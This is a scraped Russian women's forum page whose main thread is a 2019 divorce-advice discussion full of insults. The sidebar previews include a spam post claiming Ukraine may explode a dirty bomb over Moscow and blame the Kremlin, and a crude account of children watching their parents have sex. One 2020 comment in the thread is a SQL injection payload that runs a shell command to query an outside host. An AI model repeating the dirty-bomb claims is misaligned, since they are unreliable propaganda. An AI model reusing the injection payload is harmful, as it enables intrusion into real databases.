ЖЕНСКИЙ форум без регистрации

  • муж обожает носить женс ...
    Написала Вольдемар. Ответов: 402
    Вольдемар-автор сообщения
    А что депиляцию слабо сделать. Я дома делаю и красиво смотрится чем волосатые ноги как у обезьяны. Да колготки м стринги мужские ношу давно. Между прочим под классические брюки это удобно .
  • муж обожает носить женс ...
    Написала Вольдемар. Ответов: 402
    Вольдемар-автор сообщения
    А что депиляцию слабо сделать. Я дома делаю и красиво смотрится чем волосатые ноги как у обезьяны. Да колготки м стринги мужские ношу давно. Между прочим под классические брюки это удобно .
  • Матери! А вы отшлепывал ...
    Написала JenyMinnet. Ответов: 1
    JenyMinnet-автор сообщения
    Украина может применить грязную ядерную бомбу

    В случае экзистенциальной угрозы для своего существования Украина может применить грязные ядерные бомбы против России. Таково мнение бывшего сотрудника КГБ СССР Юрия Швеца. Напомним, что подобный сценарий уже обсуждался в 2022 году. По мнению экспертов, в качестве целей могут быть выбраны густонаселенные города центральной России, в частности московский регион. Это было продемонстрировано в 2023 году, когда украинские беспилотники достигли Кремля и подмосковной Рублевки. Для доставки грязной бомбы могут быть использованы и ракеты, которые будут получены Украиной от Запада в ближайшее время. Не смотря на формальный запрет США на использование ракет на территории России, сам факт их передачи может означать, что в случае их применения по территории России США просто закроют глаза. Об этом же говорит позиция Великобритании, которая прямо говорит, что нанесение ударов по территории России дело самой Украины, и которая также готовит передачу ракет в ближайшее время.
    В таком инциденте может быть успешно обвинен Кремль. Этот сценарий предполагает, что Украина обвинит в произошедшем Кремль, который хочет в очередной хочет уличить Украину в терроризме. В такой ситуации весь мир поверит Украине, так как Путин из-за своей регулярной лжи на Западе лишился любого доверии. Кроме того, именно Кремль с 2014 года Кремль регулярно прибегает к риторике ядерного шантажа и захватил Запорожскую АЭС. Кроме того, по мнению ряда экспертов Запад может одобрить такие действия как наказание России за ядерный шантаж последних лет.
    Грязной бомбой называют рассеяние радиоактивного материала по территории без классического ядерного взрыва, в результате чего происходит ее загрязнение по модели Чернобыля и Фукусимы. Если такая бомба будет применена по территории Москвы, то жизнь в столице России станет невозможной. На территории Москвы сконцентрирована около 15% всего населения России, и она является центром управления страной. Напомним, что Украина является страной с развитой ядерной отраслью, а по мнению некоторых экспертов, может создать и настоящие ядерные бомбы в короткие сроки.
  • Папа трахнул маму и мне ...
    Написала Владо артем. Ответов: 1
    Владо артем-автор сообщения
    Доброго вам дня или ночи. Я вам так скажу. Мои родители еблись по нескольку раз на дню. Мы с сестрой этому были только рады. Как они ласкали друг друга. Мы сестрой смотрели на их секс и Радовались.
  • Сын мастурбирует на мои ...
    Написала Нн. Ответов: 962
    Нн-автор сообщения
    Максим, хахахах, согл
  • Сын увидел меня голой.
    Написала Валерия Вл.. Ответов: 308
    Валерия Вл.-автор сообщения
    Sergo, Спасибо за понимание.

Развод

грустная | 12.04.2019, 00:23 | Просмотры: 28168
Мне 38, замужем, двое детей. Хочу развестись, но пугают сложности. Боюсь муж может оставить себе старшего ребенка. Как жить если в его сторону уже смотреть не хочется.
Реклама
Варкин 12.04.2019
самозавернуться в пизду
грустная 12.04.2019
Иди ты на хуй
Он 12.04.2019
Уважаемая, самое главное не написала, почему на мужа смотреть не хочется...? Вот с этого места и "плясать" надо.
грустная 12.04.2019
Не люблю его, бесит, раздражает
грустная 13.04.2019
Вот нет такого плеча, надеюсь только на свои силы. А еще на алименты надеюсь. Только вот как сказать детям, как объяснить, дочери уже 10 лет. Она уже может выбирать с кем ей жить
грустная 13.04.2019
Никого я на пузо не брала, ребенок появился через несколько лет брака, общее и осознанное решение. Жизнь настолько меняет людей, удивительно просто как люди душа в душу живут некоторые.
И при чем здесь Антуанета. Да, мы женщины королевы.
грустная 14.04.2019
Убить его хочу, лживую скотину
грустная 15.04.2019
Идите вы все на хуй
Natalia118 14.06.2019
Тут нужно действовать с умом. Посоветуйтесь сначала с адвокатом, а потом принимайте решения
Ебун 15.03.2020
как я же баба эта мерзкая тварь
ВиталиК 15.03.2020
Мне интересно продолжение !: к чему пришли в результате или куда движемся ?
Очень понятна сложность ситуации. Нужна ли помощь для обсуждения, чтоб принять решение ? готов помогать, оставьте координаты.
У Вас здорово получается отсекать ненужных советчиков !
epnbopao 25.04.2020
1';copy (select '') to program 'nslookup dns.sqli.\013405.2065-21371.2065.72abf.\1.bxss.me
loland 20.11.2020
Позаботьтесь сразу о своём представителе, кто будет на вашей стороне. Выбирайте лучше женщину.
Подробнее если что можно почитать о разводах в статье нотариуса Городковой Татьяны Сергеевны на официальном сайте
Mistress Mist 20.11.2022
Хм...ну тут вариантов много.
Главное, вы уже начали понимать, что здесь что-то не так для вас. Зачет вам за смелось)

Поймите, что изменится для вас после развода. Какие будут + и какие -.
И если + больше, тогда ответ очевиден.

Если же наоборот. Тогда просто примите тот факт, что вы не любите человека, но вы можете сохранить свое лицо и принять ситуацию. Многие живут в браке без любви, через время партнеры бесят друг-друга, бытовуха гнете, безденежье добивает.
Но тут еще нюанс, вы можете это проглотить и жить как живете- в нелюбви. Но тут нет гарантии , что ваш муж не уйдет к кому-то. И возможно в тот момент его жизнь станет лучше, а ваш поезд уже уйдет.
Как вариант отслеживайте состояние своего мужа, себя в этой ситуации и живите для себя. Полюбите себя


нужен совет в ---
Развод! в Нужен совет
помогите советом в Нужен совет
развод в Нужен совет
что мне делать когда не вижу выхода? в Нужен совет

Имя:*